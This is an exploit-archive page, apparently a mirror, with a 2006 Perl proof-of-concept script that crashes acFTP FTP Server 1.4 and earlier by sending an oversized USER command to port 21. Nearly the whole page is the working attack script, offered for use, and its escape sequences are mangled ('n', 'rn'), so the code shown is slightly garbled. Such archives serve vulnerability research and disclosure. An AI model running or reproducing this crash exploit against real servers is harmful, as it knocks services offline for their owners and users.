acFTP FTP Server <= 1.4 (USER) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : acFTP FTP Server <= 1.4 (USER) Remote Buffer Overflow PoC
# Published : 2006-05-04
# Author : Preddy
# Previous Title : XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC
# Next Title : Golden FTP Server Pro 2.70 (APPE) Remote Buffer Overflow PoC

################################################
#===== acFtpd BoF Crash Exploit =====
#
# There is a Buffer overflow at the
# USER command in acFtpd.
#
# Vuln found by: Preddy
# RootShell Security Group
#
# Usage: ac_dos.pl <ip>
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";
my $overflow = "A{" x 4700;

if($ARGV[0] == "")
{
print "################################################n";
print "# ===== acFtpd BoF Crash Exploit =====n";
print "#n";
print "# Vuln found by: Preddyn";
print "# RootShell Security Groupn";
print "# www.rootshell-security.netn";
print "#n";
print "# Usage ac_dos.pl <ip>n";
print "################################################n";
}

        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "21",
                                            Proto    => "TCP"))
        {
                print "Sending Overflow String!n";
                print "Ftp should be crashed!n";

                Win32::Sleep(300);

                print $socket "USER $overflowrn";

                Win32::Sleep(100);


                close($socket);
        }

# www.Syue.com [2006-05-04]